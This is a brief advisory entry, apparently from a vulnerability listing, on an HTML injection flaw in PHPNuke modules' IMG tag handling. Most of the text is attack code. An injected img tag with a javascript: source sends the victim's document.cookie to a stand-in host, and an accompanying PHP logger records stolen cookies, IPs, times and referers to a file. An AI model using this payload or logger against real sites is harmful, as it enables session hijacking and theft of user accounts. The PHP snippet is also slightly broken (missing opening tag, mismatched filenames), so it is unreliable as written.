|
PHPNuke Multiple Modules IMG Tag HTML Injection Vulnerability
No exploit is required. An example has been provided: <img src="javascript:window.navigate('http://www.example.com/cookies.php?c='+document.cookie);" cookies.php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('steal.php', 'a'); fwrite($fp, ' Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' '); fclose($fp); ?> |
|
|
Privacy Statement |
